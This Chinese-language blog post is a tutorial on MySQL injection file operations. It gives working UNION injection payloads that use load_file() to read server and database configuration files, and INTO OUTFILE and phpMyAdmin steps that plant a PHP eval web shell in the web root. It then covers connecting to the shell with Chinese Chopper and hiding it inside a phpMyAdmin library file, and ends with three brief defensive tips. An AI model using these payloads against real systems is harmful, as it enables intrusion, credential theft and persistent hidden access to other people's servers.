into outfile的使用

0x00 load_file()

  • 條件:
1. 要有file_priv權(quán)限
2. 知道文件絕對路徑
3. 能使用union
4. 對web目錄有讀權(quán)限  
注:若過濾了單引號,則可以將函數(shù)中的字符進行hex編碼
  • 一般步驟

    • 讀/etc/init.d下的東西,這里有配置文件路徑
    ?id=1' union select 1,2,load_file('/etc/init.d/httpd')
    
    • 得到web安裝路徑
    ?id=1' union select 1,2,load_file('/etc/apache/conf/httpd.conf')
    
    • 讀取密碼文件
    ?id=1' union select 1,2,load_file('/site/xxx.com/conf/conn.inc.php')
    

0x01 into outfile

  • 條件:
1. 要有file_priv權(quán)限  
2. 知道網(wǎng)站絕對路徑  
3. 要能用union  
4. 對web目錄有寫權(quán)限  
5. 沒有過濾單引號
  • 一般方法
    當知道路徑時,可以直接用?id=1 union select "<?php @eval($_POST['c']);?>" into outfile("C:/phpStudy/WWW/a.php")

  • 其他方法

    • 登陸phpMyAdmin
    use test;  選擇數(shù)據(jù)庫為test
    create table aaa(bbb varchar(64));   在數(shù)據(jù)庫中創(chuàng)建一個表aaa
    insert into aaa values("<?php @eval($_POST['c']);?>"); --在aaa中插入一條數(shù)據(jù)<?php @eval($_POST['c']);?>
    select * from aaa into outfile 'C:/phpStudy/WWW/a.php'; --將aaa中的數(shù)據(jù)導(dǎo)出到文件a.php
    
    • localhost:80/a.php能訪問
    drop aaa; --刪除建立的表
    
    • 然后菜刀連接
    菜刀連接http://www.aa.com/a.php,然后更改shell的名字并將shell放在較隱蔽的地方,比如C:\phpStudy\WWW\phpMyAdmin\setup\lib\common.php
    

0x02 防御

  • 數(shù)據(jù)庫連接賬號不要用root權(quán)限
  • php關(guān)閉報錯模式
  • mysql賬戶沒有權(quán)限向網(wǎng)站目錄寫文件
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 一套實用的滲透測試崗位面試題,你會嗎? 1.拿到一個待檢測的站,你覺得應(yīng)該先做什么? 收集信息 whois、網(wǎng)站源...
    g0閱讀 5,165評論 0 9
  • sqlmap用戶手冊 說明:本文為轉(zhuǎn)載,對原文中一些明顯的拼寫錯誤進行修正,并標注對自己有用的信息。 ======...
    wind_飄閱讀 2,208評論 0 5
  • Web安全之SQL注入漏洞 本節(jié)知識點 SQL注入原理 前言 結(jié)構(gòu)化查詢語句(Structured Query L...
    f354f7231c35閱讀 2,221評論 0 5
  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 當給sq...
    xuningbo閱讀 10,567評論 2 22
  • Spring Cloud為開發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見模式的工具(例如配置管理,服務(wù)發(fā)現(xiàn),斷路器,智...
    卡卡羅2017閱讀 136,711評論 19 139

友情鏈接更多精彩內(nèi)容